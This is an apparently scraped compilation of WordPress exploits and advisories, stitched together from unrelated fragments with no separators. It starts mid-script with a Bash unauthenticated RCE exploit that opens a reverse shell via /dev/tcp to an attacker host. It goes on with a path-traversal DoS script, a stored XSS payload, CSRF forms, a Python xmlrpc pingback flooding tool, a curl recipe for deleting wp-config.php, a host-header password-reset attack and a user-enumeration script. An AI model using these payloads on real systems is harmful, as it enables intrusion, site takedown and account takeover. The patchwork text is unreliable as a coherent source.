DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"
intro2="
ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09
fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb
MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE
aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09
fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg
ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh
bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt
ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp
bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1
cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="
echo "$intro" | base64 -d
echo "$intro2" | base64 -d
if [ "$#" -ne 1 ]; then
echo -e "Usage:\n$0 target-wordpress-url\n"
exit 1
fi
target="$1"
echo -ne "\e[91m[*]\033[0m"
read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
echo
if [ "$choice" == "y" ]; then
echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
echo -e "\e[92m[+]\033[0m Connected to the target"
# Serve payload/bash script on :80
RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
echo "$RCE_exec_cmd" > rce.txt
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
hpid=$!
# Save payload on the target in /tmp/rce
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
cmd="/bin/bash /tmp/rce"
prep_host_header "$cmd"
curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword &
echo -e "\n\e[92m[+]\033[0m Payload executed!"
echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
nc -vv -l 1337
echo
else
echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"
exit 0
fi
echo "Exiting..."
exit 0
Path traversal vulnerability in WordPress Core Ajax handlers
Abstract
A path traversal vulnerability was found in the Core Ajax handlers of the WordPress Admin API. This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition of an affected WordPress site.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160712-0036
See also
- CVE-2016-6896
- CVE-2016-6897
- #37490 - Improve capability checks in wp_ajax_update_plugin() and wp_ajax_delete_plugin()
Tested versions
This issue was successfully tested on the WordPress version 4.5.3.
Fix
WordPress version 4.6 mitigates this vulnerability by moving the CSRF check to the top of the affected method(s).
Introduction
WordPress is web software that can be used to create a website, blog, or app. A path traversal vulnerability exists in the Core Ajax handlers of the WordPress Admin API. This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition of an affected WordPress site.
Details
The path traversal vulnerability exists in the file ajax-actions.php, in particular in the function wp_ajax_update_plugin().
The function first tries to retrieve some version information from the target plugin. After this is done, it checks the user's privileges and it will verify the nonce (to prevent Cross-Site Request Forgery). The code that retrieves the version information from the plugin is vulnerable to path traversal. Since the security checks are done at a later stage, the affected code is reachable by any logged on user, including Subscribers.
Potentially this issue can be used to disclose information, provided that the target file contains a line with Version:. What is more important that it also allows for a denial of service condition as the logged in attacker can use this flaw to read up to 8 KB of data from /dev/random. Doing this repeatedly will deplete the entropy pool, which causes /dev/random to block; blocking the PHP scripts. Using a very simple script, it is possible for an authenticated user (Subscriber) to bring down a WordPress site. It is also possible to trigger this issue via Cross-Site Request Forgery as the nonce check is done too late in this case.
Proof of concept
The following Bash script can be used to trigger the denial of service condition.
#!/bin/bash
target="http://<target>"
username="subscriber"
password="password"
cookiejar=$(mktemp)
# login
curl --cookie-jar "$cookiejar" \
--data "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2f&testcookie=1" \
"$target/wp-login.php" \
>/dev/null 2>&1
# exhaust apache
for i in `seq 1 1000`
do
curl --cookie "$cookiejar" \
--data "plugin=../../../../../../../../../../dev/random&action=update-plugin" \
"$target/wp-admin/admin-ajax.php" \
>/dev/null 2>&1 &
done
rm "$cookiejar"
Source: http://klikki.fi/adv/wordpress2.html
## Overview
Current versions of WordPress are vulnerable to a stored XSS. An unauthenticated attacker can inject JavaScript in
WordPress comments. The script is triggered when the comment is viewed.
If triggered by a logged-in administrator, under default settings the attacker can leverage the vulnerability to
execute arbitrary code on the server via the plugin and theme editors.
Alternatively the attacker could change the administrator’s password, create new administrator accounts,
or do whatever else the currently logged-in administrator can do on the target system.
## Details
If the comment text is long enough, it will be truncated when inserted in the database.
The MySQL TEXT type size limit is 64 kilobytes, so the comment has to be quite long.
The truncation results in malformed HTML generated on the page.
The attacker can supply any attributes in the allowed HTML tags, in the same way
as with the two recently published stored XSS vulnerabilities affecting the WordPress core.
The vulnerability bears a similarity to the one reported by Cedric Van Bockhaven in
2014 (patched this week, after 14 months). Instead of using an invalid character to truncate
the comment, this time an excessively long comment is used for the same effect.
In these two cases, the injected JavaScript apparently can't be triggered in the
administrative Dashboard so these exploits seem to require getting around comment
moderation e.g. by posting one harmless comment first.
The similar vulnerability released by Klikki in November 2014 could be exploited in the
administrative Dashboard while the comment is still in the moderation queue. Some
exploit attempts of this have been recently reported in the wild.
## Proof of Concept
Enter as a comment text:
<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>
Confirmed vulnerable: WordPress 4.2, 4.1.2, 4.1.1, 3.9.3.
Tested with MySQL versions 5.1.53 and 5.5.41.
## Demo
https://www.youtube.com/watch?v=OCqQZJZ1Ie4
source: https://www.securityfocus.com/bid/55597/info
WordPress is prone to multiple path-disclosure vulnerabilities.
Remote attackers can exploit these issues to obtain sensitive information that may lead to further attacks.
WordPress 3.4.2 is vulnerable; other versions may also be affected.
http://www.example.com/learn/t/wordpress/wp-includes/vars.php
http://www.example.com/learn/t/wordpress/wp-includes/update.php
http://www.example.com/learn/t/wordpress/wp-includes/theme.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/sidebar.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/header.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/footer.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/comments.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/comments-popup.php
http://www.example.com/learn/t/wordpress/wp-includes/template-loader.php
http://www.example.com/learn/t/wordpress/wp-includes/taxonomy.php
http://www.example.com/learn/t/wordpress/wp-includes/shortcodes.php
http://www.example.com/learn/t/wordpress/wp-includes/script-loader.php
http://www.example.com/learn/t/wordpress/wp-includes/rss.php
http:www.example.com/learn/t/wordpress/wp-includes/rss-functions.php
http://www.example.com/learn/t/wordpress/wp-includes/registration.php
http://www.example.com/learn/t/wordpress/wp-includes/registration-functions.php
http://www.example.com/learn/t/wordpress/wp-includes/post.php
http://www.example.com/learn/t/wordpress/wp-includes/post-template.php
http://www.example.com/learn/t/wordpress/wp-includes/nav-menu-template.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-settings.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-functions.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-default-filters.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-default-constants.php
http://www.example.com/learn/t/wordpress/wp-includes/media.php
http://www.example.com/learn/t/wordpress/wp-includes/kses.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/config.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpell.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/GoogleSpell.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/EnchantSpell.php
http://www.example.com/learn/t/wordpress/wp-includes/general-template.php
http://www.example.com/learn/t/wordpress/wp-includes/functions.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rss2.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rss2-comments.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rss.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rdf.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-atom.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-atom-comments.php
http://www.example.com/learn/t/wordpress/wp-includes/default-widgets.php
http://www.example.com/learn/t/wordpress/wp-includes/default-filters.php
http://www.example.com/learn/t/wordpress/wp-includes/comment-template.php
http://www.example.com/learn/t/wordpress/wp-includes/class.wp-styles.php
http://www.example.com/learn/t/wordpress/wp-includes/class.wp-scripts.php
http://www.example.com/learn/t/wordpress/wp-includes/class-wp-xmlrpc-server.php
http://www.example.com/learn/t/wordpress/wp-includes/class-wp-http-ixr-client.php
http://www.example.com/learn/t/wordpress/wp-includes/class-snoopy.php
http://www.example.com/learn/t/wordpress/wp-includes/class-feed.php
http://www.example.com/learn/t/wordpress/wp-includes/category-template.php
http://www.example.com/learn/t/wordpress/wp-includes/canonical.php
http://www.example.com/learn/t/wordpress/wp-includes/author-template.php
http://www.example.com/learn/t/wordpress/wp-includes/admin-bar.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/tag.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/single.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/sidebar.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/sidebar-footer.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/search.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/onecolumn-page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-single.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-attachment.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/index.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/header.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/functions.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/footer.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/comments.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/category.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/author.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/attachment.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/archive.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/404.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/tag.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/single.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar-page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar-footer.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/showcase.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/search.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/index.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/inc/widgets.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/inc/theme-options.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/image.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/functions.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/comments.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/category.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/author.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/archive.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/404.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/hello.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/widget.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/legacy.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/akismet.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/admin.php
http://www.example.com/learn/t/wordpress/wp-admin/user/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/upgrade-functions.php
http://www.example.com/learn/t/wordpress/wp-admin/options-head.php
http://www.example.com/learn/t/wordpress/wp-admin/network/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/menu-header.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/user.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/upgrade.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/update.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/update-core.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/theme-install.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/template.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/schema.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/plugin.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/plugin-install.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/nav-menu.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/ms.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/misc.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/media.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/file.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/dashboard.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/continents-cities.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-users-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-themes-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-theme-install-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-terms-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-posts-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-plugins-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-plugin-install-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-users-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-themes-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-sites-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-media-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-links-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ssh2.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ftpsockets.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ftpext.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-direct.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-comments-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-ftp-sockets.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-ftp-pure.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/admin.php
http://www.example.com/learn/t/wordpress/wp-admin/admin-functions.php
source: https://www.securityfocus.com/bid/55660/info
WordPress is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
WordPress 3.4.2 is vulnerable; other versions may also be affected.
<body onload="javascript:document.forms[0].submit()"> <form action="http://TARGET_GOES_HERE/wp-admin/?edit=dashboard_incoming_links#dashboard_incoming_links" method="post" class="dashboard-widget-control-form"> <h1>How Many Girls You Have? xD))</h1> <!-- Idea for you: Iframe it --> <input name="widget-rss[1][url]" type="hidden" value="http://THINK_YOUR_SELF_HOW_YOU_CAN_USE_IT/test.php" /> <select id="rss-items-1" name="widget-rss[1][items]"> <option value='1' >1</option> <option value='2' >2</option> <option value='3' >3</option><option value='4' >4</option> <option value='5' >5</option> <option value='6' >6</option> <option value='7' >7</option> <option value='8' >8</option> <option value='9' >9</option> <option value='10' >10</option> <option value='11' >11</option> <option value='12' >12</option> <option value='13' >13</option> <option value='14' >14</option> <option value='15' >15</option> <option value='16' >16</option> <option value='17' >17</option> <option value='18' >18</option> <option value='19' >19</option> <option value='20' selected='selected'>20</option> </select> <input id="rss-show-date-1" name="widget-rss[1][show_date]" type="checkbox" value="1" checked="checked"/> <input type="hidden" name="widget_id" value="dashboard_incoming_links" /> </form>
source: https://www.securityfocus.com/bid/64564/info
WordPress is prone to a cross-site request-forgery vulnerability because it does not properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
WordPress 2.0.11 is vulnerable.
http://www.example.com/wp-admin/options-discussion.php?action=retrospam&move=true&ids=1
#!/usr/bin/env python
# WordPress <= 5.3.? Denial-of-Service PoC
# Abusing pingbacks+xmlrpc multicall to exhaust connections
# @roddux 2019 | Arcturus Security | labs.arcturus.net
# TODO:
# - Try and detect a pingback URL on target site
# - Optimise number of entries per request, check class-wp-xmlrpc-server.php
from urllib.parse import urlparse
import sys, uuid, urllib3, requests
urllib3.disable_warnings()
DEBUG = True
def dprint(X):
if DEBUG: print(X)
COUNT=0
def build_entry(pingback,target):
global COUNT
COUNT +=1
entry = "<value><struct><member><name>methodName</name><value>pingback.ping</value></member><member>"
entry += f"<name>params</name><value><array><data><value>{pingback}/{COUNT}</value>"
#entry += f"<name>params</name><value><array><data><value>{pingback}/{uuid.uuid4()}</value>"
entry += f"<value>{target}/?p=1</value></data></array></value></member></struct></value>"
#entry += f"<value>{target}/#e</value></data></array></value></member></struct></value>" # taxes DB more
return entry
def build_request(pingback,target,entries):
prefix = "<methodCall><methodName>system.multicall</methodName><params><param><array>"
suffix = "</array></param></params></methodCall>"
request = prefix
for _ in range(0,entries): request += build_entry(pingback,target)
request += suffix
return request
def usage_die():
print(f"[!] Usage: {sys.argv[0]} <check/attack> <pingback url> <target url>")
exit(1)
def get_args():
if len(sys.argv) != 4: usage_die()
action = sys.argv[1]
pingback = sys.argv[2]
target = sys.argv[3]
if action not in ("check","attack"): usage_die()
for URL in (pingback,target):
res = urlparse(URL)
if not all((res.scheme,res.netloc)): usage_die()
return (action,pingback,target)
def main(action,pingback,target):
print("[>] WordPress <= 5.3.? Denial-of-Service PoC")
print("[>] @roddux 2019 | Arcturus Security | labs.arcturus.net")
# he checc
if action == "check": entries = 2
# he attacc
elif action == "attack": entries = 2000
# but most importantly
print(f"[+] Running in {action} mode")
# he pingbacc
print(f"[+] Got pingback URL \"{pingback}\"")
print(f"[+] Got target URL \"{target}\"")
print(f"[+] Building {entries} pingback calls")
# entries = 1000 # TESTING
xmldata = build_request(pingback,target,entries)
dprint("[+] Request:\n")
dprint(xmldata+"\n")
print(f"[+] Request size: {len(xmldata)} bytes")
if action == "attack":
print("[+] Starting attack loop, CTRL+C to stop...")
rcount = 0
try:
while True:
try:
resp = requests.post(f"{target}/xmlrpc.php", xmldata, verify=False, allow_redirects=False, timeout=.2)
#dprint(resp.content.decode("UTF-8")[0:500]+"\n")
if resp.status_code != 200:
print(f"[!] Received odd status ({resp.status_code}) -- DoS successful?")
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
pass
rcount += 1
print(f"\r[+] Requests sent: {rcount}",end="")
except KeyboardInterrupt:
print("\n[>] Attack finished",end="\n\n")
exit(0)
elif action == "check":
print("[+] Sending check request")
try:
resp = requests.post(f"{target}/xmlrpc.php", xmldata, verify=False, allow_redirects=False, timeout=10)
if resp.status_code != 200:
print(f"[!] Received odd status ({resp.status_code}) -- check target url")
print("[+] Request sent")
print("[+] Response headers:\n")
print(resp.headers)
print("[+] Response dump:")
print(resp.content.decode("UTF-8"))
print("[+] Here's the part where you figure out if it's vulnerable, because I CBA to code it")
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
print("[!] Connection error")
exit(1)
print("[>] Check finished")
if __name__ == "__main__":
main(*get_args())
So far we know that adding `?static=1` to a wordpress URL should leak its secret content
Here are a few ways to manipulate the returned entries:
- `order` with `asc` or `desc`
- `orderby`
- `m` with `m=YYYY`, `m=YYYYMM` or `m=YYYYMMDD` date format
In this case, simply reversing the order of the returned elements suffices and `http://wordpress.local/?static=1&order=asc` will show the secret content:
# Exploit Title: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability
# Date: 2018-06-27
# Exploit Author: VulnSpy
# Vendor Homepage: http://www.wordpress.org
# Software Link: http://www.wordpress.org/download
# Version: <= 4.9.6
# Tested on: php7 mysql5
# CVE :
Step 1:
```
curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'
```
Step 2:
```
curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'
```
REF:
Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability Exploit - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
WARNING: WordPress File Delete to Code Execution - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- CVE-2017-8295
- Release date: 03.05.2017
- Revision 1.0
- Severity: Medium/High
=============================================
Source: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
If an attacker sends a request similar to the one below to a default Wordpress
installation that is accessible by the IP address (IP-based vhost):
-----[ HTTP Request ]----
POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
user_login=admin&redirect_to=&wp-submit=Get+New+Password
------------------------
Wordpress will trigger the password reset function for the admin user account.
Because of the modified HOST header, the SERVER_NAME will be set to
the hostname of attacker's choice.
As a result, Wordpress will pass the following headers and email body to the
/usr/bin/sendmail wrapper:
------[ resulting e-mail ]-----
Subject: [CompanyX WP] Password Reset
Return-Path: <wordpress@attackers-mxserver.com>
From: WordPress <wordpress@attackers-mxserver.com>
Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Someone requested that the password be reset for the following account:
http://companyX-wp/wp/wordpress/
Username: admin
If this was a mistake, just ignore this email and nothing will happen.
To reset your password, visit the following address:
<http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>
-------------------------------
As we can see, fields Return-Path, From, and Message-ID, all have the attacker's
domain set.
The verification of the headers can be performed by replacing /usr/sbin/sendmail with a
bash script of:
#!/bin/bash
cat > /tmp/outgoing-email
#!usr/bin/php
<?php
#Author: Mateus a.k.a Dctor
#fb: fb.com/hatbashbr/
#E-mail: dctoralves@protonmail.ch
#Site: https://mateuslino.tk
header ('Content-type: text/html; charset=UTF-8');
$url= "http://localhost/";
$payload="wp-json/wp/v2/users/";
$urli = file_get_contents($url.$payload);
$json = json_decode($urli, true);
if($json){
echo "*-----------------------------*\n";
foreach($json as $users){
echo "[*] ID : |" .$users['id'] ."|\n";
echo "[*] Name: |" .$users['name'] ."|\n";
echo "[*] User :|" .$users['slug'] ."|\n";
echo "\n";
}echo "*-----------------------------*";}
else{echo "[*] No user";}
?>
